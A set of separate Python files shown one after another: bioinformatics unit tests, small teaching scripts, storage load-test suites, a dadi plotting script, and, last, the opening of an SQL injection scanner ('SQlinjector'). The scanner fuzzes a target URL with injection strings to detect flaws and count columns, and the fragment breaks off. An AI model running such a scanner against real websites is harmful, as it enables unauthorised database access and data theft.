class TopLevelTests(TestCase):
    """Tests of top-level functions"""

    def setUp(self):
        """Build fixture OTU tables (counts plus several metadata encodings)."""
        # The fixtures correspond to this classic-format OTU table:
        # #OTU ID s1 s2 s3 s4 Consensus Lineage
        # 0 1 0 2 4 Root;Bacteria;Actinobacteria;Actinobacteria;Coriobacteridae;Coriobacteriales;Coriobacterineae;Coriobacteriaceae
        # 1 1 2 0 1 Root;Bacteria;Firmicutes;"Clostridia"
        # 2 0 1 1 0 Root;Bacteria;Firmicutes;"Clostridia"
        # 3 1 2 1 0 Root;Bacteria
        otu_table_vals = array([[1,0,2,4],
                                [1,2,0,1],
                                [0,1,1,0],
                                [1,2,1,0]])
        sample_ids = ['s1', 's2', 's3', 's4']
        obs_ids = ['0', '1', '2', '3']
        # Taxonomy supplied as a list of rank names per observation.
        md_as_list = [{"taxonomy": ["Root", "Bacteria", "Actinobacteria", "Actinobacteria", "Coriobacteridae", "Coriobacteriales", "Coriobacterineae", "Coriobacteriaceae"]},
                      {"taxonomy": ["Root", "Bacteria", "Firmicutes", "\"Clostridia\""]},
                      {"taxonomy": ["Root", "Bacteria", "Firmicutes", "\"Clostridia\""]},
                      {"taxonomy": ["Root", "Bacteria"]}]
        # Same taxonomy, but as a single semicolon-delimited string.
        md_as_string = [{"taxonomy": "Root;Bacteria;Actinobacteria;Actinobacteria;Coriobacteridae;Coriobacteriales;Coriobacterineae;Coriobacteriaceae"},
                        {"taxonomy": "Root;Bacteria;Firmicutes;\"Clostridia\""},
                        {"taxonomy": "Root;Bacteria;Firmicutes;\"Clostridia\""},
                        {"taxonomy": "Root;Bacteria"}]
        # Mixed 1-1 and 1-M metadata, in various supported formats.
        one_to_many_md = [{"taxonomy": [['a', 'b', 'c'], ['a', 'b']]},
                          {"taxonomy": ['a', 'b', 'c']},
                          {"taxonomy": [['a', 'bb', 'c', 'd']]},
                          {"taxonomy": [['a', 'bb'], ['b']]}]
        self.otu_table = table_factory(otu_table_vals, sample_ids, obs_ids,
                                       None, md_as_list)
        self.otu_table_rel = self.otu_table.normObservationBySample()
        self.otu_table_md_as_string = table_factory(otu_table_vals, sample_ids,
                                                    obs_ids, None,
                                                    md_as_string)
        # Table with no observation metadata at all.
        self.minimal_table = table_factory(otu_table_vals, sample_ids, obs_ids,
                                           None, None)
        self.otu_table_one_to_many = table_factory(otu_table_vals, sample_ids,
                                                   obs_ids, None,
                                                   one_to_many_md)
        self.mapping="""#SampleID\tBarcodeSequence\tTreatment\tDescription
#Test mapping file
s1\tAAAA\tControl\tControl mouse, I.D. 354
s2\tGGGG\tControl\tControl mouse, I.D. 355
s3\tCCCC\tExp\tDisease mouse, I.D. 356
s4\tTTTT\tExp\tDisease mouse, I.D. 357""".split('\n')

    def test_make_summary(self):
        """make_summary works"""
        # level 2
        exp_data = array([3.0, 5.0, 4.0, 5.0])
        exp = table_factory(exp_data, ['s1', 's2', 's3', 's4'],
                            ['Root;Bacteria'])
        obs = make_summary(self.otu_table, 2, absolute_abundance=True)
        self.assertEqual(obs, exp)
        self.assertEqual(type(obs), SparseTaxonTable)
        # level 3
        exp_data = array([[1.0, 0.0, 2.0, 4.0],
                          [1.0, 3.0, 1.0, 1.0],
                          [1.0, 2.0, 1.0, 0.0]])
        exp = table_factory(exp_data, ['s1', 's2', 's3', 's4'],
                            ['Root;Bacteria;Actinobacteria',
                             'Root;Bacteria;Firmicutes',
                             'Root;Bacteria;Other'])
        obs = make_summary(self.otu_table, 3, absolute_abundance=True)
        self.assertEqual(obs, exp)
        # level 4 (lineages shorter than 4 levels are padded with 'Other')
        exp = table_factory(exp_data, ['s1', 's2', 's3', 's4'],
                            ['Root;Bacteria;Actinobacteria;Actinobacteria',
                             'Root;Bacteria;Firmicutes;"Clostridia"',
                             'Root;Bacteria;Other;Other'])
        obs = make_summary(self.otu_table, 4, absolute_abundance=True)
        self.assertEqual(obs, exp)
        # md_as_string=True
        obs = make_summary(self.otu_table_md_as_string, 4,
                           absolute_abundance=True, md_as_string=True)
        self.assertEqual(obs, exp)
        # custom delimiter
        exp = table_factory(exp_data, ['s1', 's2', 's3', 's4'],
                            ['Root>Bacteria>Actinobacteria>Actinobacteria',
                             'Root>Bacteria>Firmicutes>"Clostridia"',
                             'Root>Bacteria>Other>Other'])
        obs = make_summary(self.otu_table, 4, absolute_abundance=True,
                           delimiter='>')
        self.assertEqual(obs, exp)
        # custom constructor
        obs = make_summary(self.otu_table, 4, absolute_abundance=True,
                           delimiter='>', constructor=SparseOTUTable)
        self.assertEqual(obs, exp)
        self.assertEqual(type(obs), SparseOTUTable)
        # absolute_abundance=False
        exp_data = array([1.0, 1.0, 1.0, 1.0])
        exp = table_factory(exp_data, ['s1', 's2', 's3', 's4'],
                            ['Root;Bacteria'])
        obs = make_summary(self.otu_table, 2, absolute_abundance=False)
        self.assertEqual(obs, exp)
        self.assertEqual(type(obs), SparseTaxonTable)

    def test_make_summary_invalid_input(self):
        """make_summary handles invalid input"""
        # No metadata.
        with self.assertRaises(ValueError):
            make_summary(self.minimal_table, 2)
        # Wrong metadata key.
        with self.assertRaises(KeyError):
            make_summary(self.otu_table, 2, md_identifier='foo')
        # one_to_many='divide' and absolute_abundance=True
        with self.assertRaises(ValueError):
            obs = make_summary(self.otu_table_one_to_many, 3,
                               one_to_many='divide', absolute_abundance=True)

    def test_make_summary_relative_abundances(self):
        """make_summary works with relative abundances"""
        exp_data = array([[1.0 / 3, 0.0, 0.5, 0.8],
                          [1.0 / 3, 0.6, 0.25, 0.2],
                          [1.0 / 3, 0.4, 0.25, 0.0]])
        exp = table_factory(exp_data, ['s1', 's2', 's3', 's4'],
                            ['Root;Bacteria;Actinobacteria',
                             'Root;Bacteria;Firmicutes',
                             'Root;Bacteria;Other'])
        obs = make_summary(self.otu_table_rel, 3)
        # Can't use __eq__ here because of floating point error.
        self.assertEqual(obs.SampleIds, exp.SampleIds)
        self.assertEqual(obs.ObservationIds, exp.ObservationIds)
        self.assertFloatEqual(obs.sampleData('s1'), exp.sampleData('s1'))
        self.assertFloatEqual(obs.sampleData('s2'), exp.sampleData('s2'))
        self.assertFloatEqual(obs.sampleData('s3'), exp.sampleData('s3'))
        self.assertFloatEqual(obs.sampleData('s4'), exp.sampleData('s4'))

    def test_make_summary_trimming(self):
        """make_summary correctly trims taxa based on abundance"""
        # testing lower trimming
        exp_data = array([[1.0 / 3, 0.4, 0.25, 0.0]])
        exp = table_factory(exp_data, ['s1', 's2', 's3', 's4'],
                            ['Root;Bacteria;Other'])
        obs = make_summary(self.otu_table_rel, 3, absolute_abundance=True,
                           lower_percentage=0.3)
        self.assertEqual(obs.SampleIds, exp.SampleIds)
        self.assertEqual(obs.ObservationIds, exp.ObservationIds)
        self.assertFloatEqual(obs.sampleData('s1'), exp.sampleData('s1'))
        self.assertFloatEqual(obs.sampleData('s2'), exp.sampleData('s2'))
        self.assertFloatEqual(obs.sampleData('s3'), exp.sampleData('s3'))
        self.assertFloatEqual(obs.sampleData('s4'), exp.sampleData('s4'))
        # testing upper trimming
        exp_data = array([[1.0 / 3, 0.0, 0.5, 0.8]])
        exp = table_factory(exp_data, ['s1', 's2', 's3', 's4'],
                            ['Root;Bacteria;Actinobacteria'])
        obs = make_summary(self.otu_table_rel, 3, absolute_abundance=True,
                           upper_percentage=0.4)
        self.assertEqual(obs.SampleIds, exp.SampleIds)
        self.assertEqual(obs.ObservationIds, exp.ObservationIds)
        self.assertFloatEqual(obs.sampleData('s1'), exp.sampleData('s1'))
        self.assertFloatEqual(obs.sampleData('s2'), exp.sampleData('s2'))
        self.assertFloatEqual(obs.sampleData('s3'), exp.sampleData('s3'))
        self.assertFloatEqual(obs.sampleData('s4'), exp.sampleData('s4'))
        # test lower and upper trimming
        exp_data = array([[1.0 / 3, 0.6, 0.25, 0.2]])
        exp = table_factory(exp_data, ['s1', 's2', 's3', 's4'],
                            ['Root;Bacteria;Firmicutes'])
        obs = make_summary(self.otu_table_rel, 3, absolute_abundance=True,
                           upper_percentage=0.3, lower_percentage=0.4)
        self.assertEqual(obs.SampleIds, exp.SampleIds)
        self.assertEqual(obs.ObservationIds, exp.ObservationIds)
        self.assertFloatEqual(obs.sampleData('s1'), exp.sampleData('s1'))
        self.assertFloatEqual(obs.sampleData('s2'), exp.sampleData('s2'))
        self.assertFloatEqual(obs.sampleData('s3'), exp.sampleData('s3'))
        self.assertFloatEqual(obs.sampleData('s4'), exp.sampleData('s4'))
        # test trimming everything out
        with self.assertRaises(TableException):
            make_summary(self.otu_table_rel, 3, upper_percentage=0.2,
                         lower_percentage=0.2)

    def test_make_summary_one_to_many(self):
        """make_summary works with one-to-many obs-md relationship"""
        # one_to_many='first'
        exp_data = array([[2.0, 2.0, 2.0, 5.0],
                          [1.0, 2.0, 1.0, 0.0],
                          [0.0, 1.0, 1.0, 0.0]])
        exp = table_factory(exp_data, ['s1', 's2', 's3', 's4'],
                            ['a;b;c', 'a;bb;Other', 'a;bb;c'])
        obs = make_summary(self.otu_table_one_to_many, 3,
                           absolute_abundance=True, one_to_many='first')
        self.assertEqual(obs, exp)
        self.assertEqual(type(obs), SparseTaxonTable)
        # one_to_many='add'
        exp_data = array([[1.0, 0.0, 2.0, 4.0],
                          [2.0, 2.0, 2.0, 5.0],
                          [1.0, 2.0, 1.0, 0.0],
                          [0.0, 1.0, 1.0, 0.0],
                          [1.0, 2.0, 1.0, 0.0]])
        exp = table_factory(exp_data, ['s1', 's2', 's3', 's4'],
                            ['a;b;Other', 'a;b;c', 'a;bb;Other', 'a;bb;c',
                             'b;Other;Other'])
        obs = make_summary(self.otu_table_one_to_many, 3,
                           absolute_abundance=True, one_to_many='add')
        self.assertEqual(obs, exp)
        self.assertEqual(type(obs), SparseTaxonTable)
        # one_to_many='divide'
        exp_data = array([[1/6, 0.0, 0.25, 0.4],
                          [0.5, 0.4, 0.25, 0.6],
                          [1/6, 0.2, 0.125, 0.0],
                          [0.0, 0.2, 0.25, 0.0],
                          [1/6, 0.2, 0.125, 0.0]])
        exp = table_factory(exp_data, ['s1', 's2', 's3', 's4'],
                            ['a;b;Other', 'a;b;c', 'a;bb;Other', 'a;bb;c',
                             'b;Other;Other'])
        # Using absolute abundance input table.
        obs = make_summary(self.otu_table_one_to_many, 3, one_to_many='divide')
        self.assertEqual(obs, exp)
        self.assertEqual(type(obs), SparseTaxonTable)
        # Using relative abundance input table. Should get same result as
        # above.
        obs = make_summary(
            self.otu_table_one_to_many.normObservationBySample(), 3,
            one_to_many='divide')
        self.assertEqual(obs.SampleIds, exp.SampleIds)
        self.assertEqual(obs.ObservationIds, exp.ObservationIds)
        self.assertFloatEqual(obs.sampleData('s1'), exp.sampleData('s1'))
        self.assertFloatEqual(obs.sampleData('s2'), exp.sampleData('s2'))
        self.assertFloatEqual(obs.sampleData('s3'), exp.sampleData('s3'))
        self.assertFloatEqual(obs.sampleData('s4'), exp.sampleData('s4'))
        self.assertEqual(type(obs), SparseTaxonTable)

    def test_add_summary_mapping(self):
        """add_summary_mapping works"""
        mapping, header, comments = parse_mapping_file(self.mapping)
        summary, taxon_order = add_summary_mapping(self.otu_table, mapping, 3,
                                                   absolute_abundance=True,
                                                   delimiter='FOO')
        self.assertEqual(taxon_order, ('RootFOOBacteriaFOOActinobacteria',
                                       'RootFOOBacteriaFOOFirmicutes',
                                       'RootFOOBacteriaFOOOther'))
        self.assertEqual(summary, {'s1':[1,1,1],
                                   's2':[0,3,2],
                                   's3':[2,1,1],
                                   's4':[4,1,0]})

    def test_make_collapse_fn_invalid_input(self):
        """_make_collapse_fn correctly handles invalid input"""
        with self.assertRaises(ValueError):
            _make_collapse_fn(1, one_to_many='foo')
#run unit tests if run from command-line
if __name__ == '__main__':
    main()
|
def longestWord(words):
    """Sort *words* in place by word length and return the same list.

    Bug fix: the original called ``words.sort()`` with no key, sorting
    lexicographically, so despite the function's name the longest word did
    not end up last. Sorting with ``key=len`` orders shortest-to-longest
    (the last element is a longest word); ties keep their original relative
    order because list.sort is stable. The list-in / same-list-out
    interface is unchanged.
    """
    words.sort(key=len)
    return words
# Demo: longestWord sorts in place, so the second print shows the same
# (now sorted) list object. NOTE: Python 2 print-statement syntax.
words = ["rac","rs","ra","on","r","otif","o","onpdu","rsf","rs","ot","oti","racy","onpd"]
print longestWord(words)
print words
|
__author__ = 'Elisabetta Ronchieri'
import unittest
from tstorm.tests.atomic import atomics
from tstorm.tests.load import loads
from tstorm.tests import utilities
def ts_storm_get_transfer_protocols(conf, ifn, dfn, bifn, uid, lfn):
    """Suite running only the 'get transfer protocols' load test."""
    suite = unittest.TestSuite()
    for case in ('test_storm_get_transfer_protocols',):
        suite.addTest(loads.LoadsTest(case, conf, ifn, dfn, bifn, uid, lfn))
    return suite
def ts_storm_ls_unexist_file(conf, ifn, dfn, bifn, uid, lfn):
    """Suite running only the 'ls a non-existent file' load test."""
    suite = unittest.TestSuite()
    for case in ('test_storm_ls_unexist_file',):
        suite.addTest(loads.LoadsTest(case, conf, ifn, dfn, bifn, uid, lfn))
    return suite
def ts_storm_ls_unexist_dir(conf, ifn, dfn, bifn, uid, lfn):
    """Suite running only the 'ls a non-existent directory' load test."""
    suite = unittest.TestSuite()
    for case in ('test_storm_ls_unexist_dir',):
        suite.addTest(loads.LoadsTest(case, conf, ifn, dfn, bifn, uid, lfn))
    return suite
def ts_storm_rm_unexist_file(conf, ifn, dfn, bifn, uid, lfn):
    """Suite running only the 'rm a non-existent file' load test."""
    suite = unittest.TestSuite()
    for case in ('test_storm_rm_unexist_file',):
        suite.addTest(loads.LoadsTest(case, conf, ifn, dfn, bifn, uid, lfn))
    return suite
def ts_storm_rm_unexist_dir(conf, ifn, dfn, bifn, uid, lfn):
    """Suite running only the 'rm a non-existent directory' load test."""
    suite = unittest.TestSuite()
    for case in ('test_storm_rm_unexist_dir',):
        suite.addTest(loads.LoadsTest(case, conf, ifn, dfn, bifn, uid, lfn))
    return suite
def ts_storm_mkdir(conf, ifn, dfn, bifn, uid, lfn):
    """Suite: create a directory, then remove it again."""
    suite = unittest.TestSuite()
    for case in ('test_storm_mkdir', 'test_storm_rm_dir'):
        suite.addTest(loads.LoadsTest(case, conf, ifn, dfn, bifn, uid, lfn))
    return suite
def ts_storm_mkdir_exist(conf, ifn, dfn, bifn, uid, lfn):
    """Suite: mkdir, mkdir again on the existing directory, then clean up."""
    suite = unittest.TestSuite()
    for case in ('test_storm_mkdir',
                 'test_storm_mkdir_exist_dir',
                 'test_storm_rm_dir'):
        suite.addTest(loads.LoadsTest(case, conf, ifn, dfn, bifn, uid, lfn))
    return suite
def ts_storm_rm_dir(conf, ifn, dfn, bifn, uid, lfn):
    """Suite for directory removal (mkdir twice, then rm the directory)."""
    suite = unittest.TestSuite()
    for case in ('test_storm_mkdir',
                 'test_storm_mkdir_exist_dir',
                 'test_storm_rm_dir'):
        suite.addTest(loads.LoadsTest(case, conf, ifn, dfn, bifn, uid, lfn))
    return suite
def ts_storm_ls_dir(conf, ifn, dfn, bifn, uid, lfn):
    """Suite: create a directory, ls it, then remove it."""
    suite = unittest.TestSuite()
    for case in ('test_storm_mkdir',
                 'test_storm_mkdir_exist_dir',
                 'test_storm_ls_dir',
                 'test_storm_rm_dir'):
        suite.addTest(loads.LoadsTest(case, conf, ifn, dfn, bifn, uid, lfn))
    return suite
def ts_storm_prepare_to_put(conf, ifn, dfn, bifn, uid, lfn):
    """Suite: make a local file, exercise prepare-to-put, then clean up."""
    suite = unittest.TestSuite()
    suite.addTest(utilities.UtilitiesTest('test_dd', conf, ifn, bifn, uid, lfn))
    for case in ('test_storm_ls_unexist_file',
                 'test_storm_mkdir',
                 'test_storm_prepare_to_put',
                 'test_storm_ls_fake_file',
                 'test_storm_rm_file',
                 'test_storm_rm_dir'):
        suite.addTest(loads.LoadsTest(case, conf, ifn, dfn, bifn, uid, lfn))
    suite.addTest(utilities.UtilitiesTest('test_rm_lf', conf, ifn, bifn, uid, lfn))
    return suite
def ts_storm_prepare_to_put_exist_file(conf, ifn, dfn, bifn, uid, lfn):
    """Suite: copy a file in first, then prepare-to-put onto the existing file."""
    suite = unittest.TestSuite()
    suite.addTest(utilities.UtilitiesTest('test_dd', conf, ifn, bifn, uid, lfn))
    for case in ('test_storm_ls_unexist_file', 'test_storm_mkdir'):
        suite.addTest(loads.LoadsTest(case, conf, ifn, dfn, bifn, uid, lfn))
    suite.addTest(atomics.AtomicsTest('test_lcg_cp_out', conf, ifn, dfn, bifn, uid, lfn))
    for case in ('test_storm_prepare_to_put_exist_file',
                 'test_storm_rm_file',
                 'test_storm_rm_dir'):
        suite.addTest(loads.LoadsTest(case, conf, ifn, dfn, bifn, uid, lfn))
    suite.addTest(utilities.UtilitiesTest('test_rm_lf', conf, ifn, bifn, uid, lfn))
    return suite
def ts_storm_put_done(conf, ifn, dfn, bifn, uid, lfn):
    """Suite: exercise the put-done call inside a full setup/teardown cycle."""
    suite = unittest.TestSuite()
    suite.addTest(utilities.UtilitiesTest('test_dd', conf, ifn, bifn, uid, lfn))
    for case in ('test_storm_ls_unexist_file',
                 'test_storm_mkdir',
                 'test_storm_put_done',
                 'test_storm_ls_fake_file',
                 'test_storm_rm_file',
                 'test_storm_rm_dir'):
        suite.addTest(loads.LoadsTest(case, conf, ifn, dfn, bifn, uid, lfn))
    suite.addTest(utilities.UtilitiesTest('test_rm_lf', conf, ifn, bifn, uid, lfn))
    return suite
def ts_storm_ls_file(conf, ifn, dfn, bifn, uid, lfn):
    """Suite: prepare-to-put a file and ls it, with full setup/teardown."""
    suite = unittest.TestSuite()
    suite.addTest(utilities.UtilitiesTest('test_dd', conf, ifn, bifn, uid, lfn))
    for case in ('test_storm_ls_unexist_file',
                 'test_storm_mkdir',
                 'test_storm_prepare_to_put',
                 'test_storm_ls_fake_file',
                 'test_storm_rm_file',
                 'test_storm_rm_dir'):
        suite.addTest(loads.LoadsTest(case, conf, ifn, dfn, bifn, uid, lfn))
    suite.addTest(utilities.UtilitiesTest('test_rm_lf', conf, ifn, bifn, uid, lfn))
    return suite
def ts_storm_rm_file(conf, ifn, dfn, bifn, uid, lfn):
    """Suite covering file removal (same sequence as the ls-file suite)."""
    suite = unittest.TestSuite()
    suite.addTest(utilities.UtilitiesTest('test_dd', conf, ifn, bifn, uid, lfn))
    for case in ('test_storm_ls_unexist_file',
                 'test_storm_mkdir',
                 'test_storm_prepare_to_put',
                 'test_storm_ls_fake_file',
                 'test_storm_rm_file',
                 'test_storm_rm_dir'):
        suite.addTest(loads.LoadsTest(case, conf, ifn, dfn, bifn, uid, lfn))
    suite.addTest(utilities.UtilitiesTest('test_rm_lf', conf, ifn, bifn, uid, lfn))
    return suite
def ts_storm_prepare_to_get(conf, ifn, dfn, bifn, uid, lfn):
    """Suite: copy a file in, then exercise prepare-to-get on it."""
    suite = unittest.TestSuite()
    suite.addTest(utilities.UtilitiesTest('test_dd', conf, ifn, bifn, uid, lfn))
    suite.addTest(loads.LoadsTest('test_storm_ls_unexist_file', conf, ifn, dfn, bifn, uid, lfn))
    suite.addTest(atomics.AtomicsTest('test_lcg_cp_out', conf, ifn, dfn, bifn, uid, lfn))
    for case in ('test_storm_ls_file',
                 'test_storm_prepare_to_get',
                 'test_storm_rm_file',
                 'test_storm_rm_dir'):
        suite.addTest(loads.LoadsTest(case, conf, ifn, dfn, bifn, uid, lfn))
    suite.addTest(utilities.UtilitiesTest('test_rm_lf', conf, ifn, bifn, uid, lfn))
    return suite
def ts_storm_prepare_to_get_unexist_file(conf, ifn, dfn, bifn, uid, lfn):
    """Suite: prepare-to-get on a file that does not exist."""
    suite = unittest.TestSuite()
    suite.addTest(utilities.UtilitiesTest('test_dd', conf, ifn, bifn, uid, lfn))
    suite.addTest(loads.LoadsTest('test_storm_prepare_to_get_unexist_file', conf, ifn, dfn, bifn, uid, lfn))
    suite.addTest(utilities.UtilitiesTest('test_rm_lf', conf, ifn, bifn, uid, lfn))
    return suite
def ts_storm_release_file(conf, ifn, dfn, bifn, uid, lfn):
    """Suite: copy a file in, then exercise the release-file call on it."""
    suite = unittest.TestSuite()
    suite.addTest(utilities.UtilitiesTest('test_dd', conf, ifn, bifn, uid, lfn))
    suite.addTest(loads.LoadsTest('test_storm_ls_unexist_file', conf, ifn, dfn, bifn, uid, lfn))
    suite.addTest(atomics.AtomicsTest('test_lcg_cp_out', conf, ifn, dfn, bifn, uid, lfn))
    for case in ('test_storm_ls_file',
                 'test_storm_release_file',
                 'test_storm_rm_file',
                 'test_storm_rm_dir'):
        suite.addTest(loads.LoadsTest(case, conf, ifn, dfn, bifn, uid, lfn))
    suite.addTest(utilities.UtilitiesTest('test_rm_lf', conf, ifn, bifn, uid, lfn))
    return suite
|
def fibonacci(n):
    """Return the n-th Fibonacci number via naive double recursion."""
    if n in (0, 1):
        return n
    return fibonacci(n - 2) + fibonacci(n - 1)
# Demo: prints 55, the 10th Fibonacci number.
print(fibonacci(10))
def fibonacci_v2(n):
    """Iterative Fibonacci; prints a message (and returns None) for n < 0."""
    prev, cur = 0, 1
    if n < 0:
        print("Incorrect input")
    elif n == 0:
        return 0
    elif n == 1:
        return cur
    else:
        for _ in range(1, n):
            prev, cur = cur, prev + cur
        return cur
# Demo: prints 55 again, via the iterative implementation.
print(fibonacci_v2(10))
|
import commands
import parameters
import subprocess
class Jarvis:
    """Tiny console assistant: echoes phrases and dispatches simple commands."""

    def __init__(self):
        # No state to initialise yet.
        pass

    def say(self, phrase):
        """Print *phrase* to stdout wrapped in double quotes."""
        print(f'"{phrase}"')

    def listen(self):
        """Read one line from the user and return it."""
        return input("> ")

    def process(self, phrase):
        """
        Execute actions depending on @phrase.
        @phrase should always be lower case.
        """
        # Ignore anything not addressed to the assistant.
        if "jarvis" not in phrase:
            return
        words = phrase.split(" ")
        command = words[1]
        if command == "open":
            name = "".join(words[2:])
            try:
                subprocess.call(name)
                self.say(f"Opening {name}.")
            except FileNotFoundError:
                self.say(f"Could not find {name}.")
            return
        if command == "brightness":
            try:
                assert commands.brightness(words[2]) == 0
            except (AssertionError, IndexError):
                self.say("Error in brightness command.")
        elif command == "volume":
            try:
                assert commands.volume(words[2]) == 0
            except (AssertionError, IndexError):
                self.say("Error in volume command.")
        elif "hello" in phrase:
            self.say(f"Hello, {parameters.NAME}.")
        else:
            self.say("I cannot execute your command yet.")
|
#!/usr/bin/env python3
import dadi
import matplotlib
import pylab
import numpy
from dadi import Numerics, Inference
def plot_1d_comp_multinom(model, data, fig_num=None, residual='Anscombe',
                          plot_masked=False):
    """
    Multinomial comparison between 1d model and data.

    model: 1-dimensional model SFS
    data: 1-dimensional data SFS
    fig_num: Clear and use figure fig_num for display. If None, an new figure
             window is created.
    residual: 'Anscombe' for Anscombe residuals, which are more normally
              distributed for Poisson sampling. 'linear' for the linear
              residuals, which can be less biased.
    plot_masked: Additionally plots (in open circles) results for points in the
                 model or data that were masked.

    This comparison is multinomial in that it rescales the model to optimally
    fit the data before delegating to the Poisson comparison plot.
    """
    scaled_model = Inference.optimally_scaled_sfs(model, data)
    plot_1d_comp_Poisson(scaled_model, data, fig_num, residual, plot_masked)
def plot_1d_comp_Poisson(model, data, fig_num=None, residual='Anscombe',
                         plot_masked=False, show=True):
    """
    Poisson comparison between 1d model and data.

    model: 1-dimensional model SFS
    data: 1-dimensional data SFS
    fig_num: Clear and use figure fig_num for display. If None, an new figure
             window is created.
    residual: 'Anscombe' for Anscombe residuals, which are more normally
              distributed for Poisson sampling. 'linear' for the linear
              residuals, which can be less biased.
    plot_masked: Additionally plots (in open circles) results for points in the
                 model or data that were masked.
    show: If True, execute pylab.show command to make sure plot displays.
    """
    if fig_num is None:
        f = pylab.gcf()
    else:
        f = pylab.figure(fig_num, figsize=(10,8))
    pylab.clf()
    # Fold the model when the data are folded so the two are comparable.
    if data.folded and not model.folded:
        model = model.fold()
    masked_model, masked_data = Numerics.intersect_masks(model, data)
    # Top panel: data (blue) vs model (red) on a log y-axis.
    ax = pylab.subplot(2,1,1)
    pylab.semilogy(masked_data, '-ob')
    pylab.semilogy(masked_model, '-or')
    if plot_masked:
        pylab.semilogy(masked_data.data, '--ob', mfc='w', zorder=-100)
        pylab.semilogy(masked_model.data, '--or', mfc='w', zorder=-100)
    # Bottom panel: residuals, sharing the x-axis with the top panel.
    pylab.subplot(2,1,2, sharex = ax)
    if residual == 'Anscombe':
        resid = Inference.Anscombe_Poisson_residual(masked_model, masked_data)
    elif residual == 'linear':
        resid = Inference.linear_Poisson_residual(masked_model, masked_data)
    else:
        raise ValueError("Unknown class of residual '%s'." % residual)
    pylab.plot(resid, '-og')
    # NOTE(review): hard-coded residual y-limits; these look dataset-specific
    # — confirm they are intended for general use.
    pylab.ylim(-160,120)
    if plot_masked:
        pylab.plot(resid.data, '--og', mfc='w', zorder=-100)
    ax.set_xlim(0, data.shape[0]-1)
    if show:
        pylab.show()
def three_epoch(params, ns, pts):
    """
    Three-epoch demographic model with an inbreeding term.

    params = (nuB,nuF,TB,TF,F)
    ns = (n1,)

    nuB: Ratio of bottleneck population size to ancient pop size
    nuF: Ratio of contemporary to ancient pop size
    TB: Length of bottleneck (in units of 2*Na generations)
    TF: Time since bottleneck recovery (in units of 2*Na generations)
    F: passed to Spectrum.from_phi_inbreeding — presumably the inbreeding
       coefficient (TODO confirm against the dadi documentation)
    n1: Number of samples in resulting Spectrum
    pts: Number of grid points to use in integration.
    """
    # NOTE: this unpacks five parameters; the original docstring omitted F.
    nuB,nuF,TB,TF,F = params
    xx = dadi.Numerics.default_grid(pts)
    phi = dadi.PhiManip.phi_1D(xx)
    # Bottleneck epoch followed by the recovery epoch.
    phi = dadi.Integration.one_pop(phi, xx, TB, nuB)
    phi = dadi.Integration.one_pop(phi, xx, TF, nuF)
    fs = dadi.Spectrum.from_phi_inbreeding(phi, ns, (xx,), (F,), (2,))
    return fs
def three_epoch_noF(params, ns, pts):
    """
    Three-epoch demographic model without an inbreeding term.

    params = (nuB,nuF,TB,TF)
    ns = (n1,)

    nuB: Ratio of bottleneck population size to ancient pop size
    nuF: Ratio of contemporary to ancient pop size
    TB: Length of bottleneck (in units of 2*Na generations)
    TF: Time since bottleneck recovery (in units of 2*Na generations)
    n1: Number of samples in resulting Spectrum
    pts: Number of grid points to use in integration.
    """
    nuB, nuF, TB, TF = params
    grid = dadi.Numerics.default_grid(pts)
    phi = dadi.PhiManip.phi_1D(grid)
    # Integrate through the bottleneck epoch, then the recovery epoch.
    for duration, size in ((TB, nuB), (TF, nuF)):
        phi = dadi.Integration.one_pop(phi, grid, duration, size)
    return dadi.Spectrum.from_phi(phi, ns, (grid,))
if __name__ == "__main__":
    # Load the folded empirical SFS and plot fits for both models.
    data = dadi.Spectrum.from_file("cabbage.fs")
    data = data.fold()
    # Grid sizes used for extrapolation.
    pts_l = [100,110,120]
    func1 = three_epoch
    func1_ex = dadi.Numerics.make_extrap_log_func(func1)
    func2 = three_epoch_noF
    func2_ex = dadi.Numerics.make_extrap_log_func(func2)
    # Hard-coded parameter vectors — presumably from a previous optimisation
    # run (TODO confirm provenance). popt includes F as the last entry.
    popt = [1.810449088130342,12.2790194725467110,0.47393521119534737,0.00921096365957015,0.577870722504928]
    popt_noF = [6.4524615672350958,0.0309347139612217,0.153264805381591,0.00100000000000000]
    model = func1_ex(popt, data.sample_sizes, pts_l)
    model = model.fold()
    model_noF = func2_ex(popt_noF, data.sample_sizes, pts_l)
    model_noF = model_noF.fold()
    plot_1d_comp_multinom(model,data, fig_num=1)
    #plt.savefig("puma_fit.pdf")
    #plt.close()
    plot_1d_comp_multinom(model_noF, data, fig_num=2)
    #plt.savefig("puma_fit_noF.pdf")
    #plt.close()
|
import math
# Read the two leg lengths and print the hypotenuse.
# Fixes Portuguese typos in the user-facing strings:
# "aposto" -> "oposto", "adiacente" -> "adjacente", "midir" -> "medir".
co = float(input('Comprimento do cateto oposto: '))
ca = float(input('Comprimento do cateto adjacente: '))
# math.hypot computes sqrt(co**2 + ca**2).
hi = math.hypot(co, ca)
print(f'A hipotenusa vai medir {hi:.2f}')
|
import requests
import sys
import getopt
import re
from termcolor import colored
def banner():
    # Print the tool banner (Python 2 print-statement syntax throughout).
    print "\n***************************************"
    print "* SQlinjector 1.0 *"
    print "***************************************"
def usage():
    # Show command-line help: -w takes the target URL with a FUZZ
    # placeholder, -i the file of injection strings.
    print "Usage:"
    print " -w: url (http://somesite.com/news.php?id=FUZZ)\n"
    print " -i: injection strings file \n"
    print "example: SQLinjector.py -w http://www.somesite.com/news.php?id=FUZZ \n"
def start(argv):
    # Entry point: parse -w (target URL) and -i (injection strings file),
    # load the strings and hand off to launcher().
    banner()
    if len(sys.argv) < 2:
        usage()
        sys.exit()
    try:
        opts, args = getopt.getopt(argv,"w:i:")
    except getopt.GetoptError:
        print "Error en arguments"
        sys.exit()
    for opt,arg in opts :
        if opt == '-w' :
            url=arg
        elif opt == '-i':
            dictio = arg
    # NOTE(review): url/dictio are only bound inside the option loop, so a
    # missing -w or -i leads to a NameError below.
    try:
        print "[-] Opening injections file: " + dictio
        f = open(dictio, "r")
        name = f.read().splitlines()
    except:
        # Bare except: any failure (including typos above) is reported as a
        # file-open problem.
        print"Failed opening file: "+ dictio+"\n"
        sys.exit()
    launcher(url,name)
def launcher (url,dictio):
    # Drive the full scan: error-based detection, column counting,
    # version/user fingerprinting and credential extraction.
    injected = []
    for x in dictio:
        sqlinjection=x
        injected.append(url.replace("FUZZ",sqlinjection))
    res = injector(injected)
    print colored('[+] Detection results:','green')
    print "------------------"
    for x in res:
        print x.split(";")[0]
    print colored ('[+] Detect columns: ','green')
    print "-----------------"
    res = detect_columns(url)
    print "Number of columns: " + res
    '''res = detect_columns_names(url)
    print "[+] Columns names found: "
    print "-------------------------"
    for col in res:
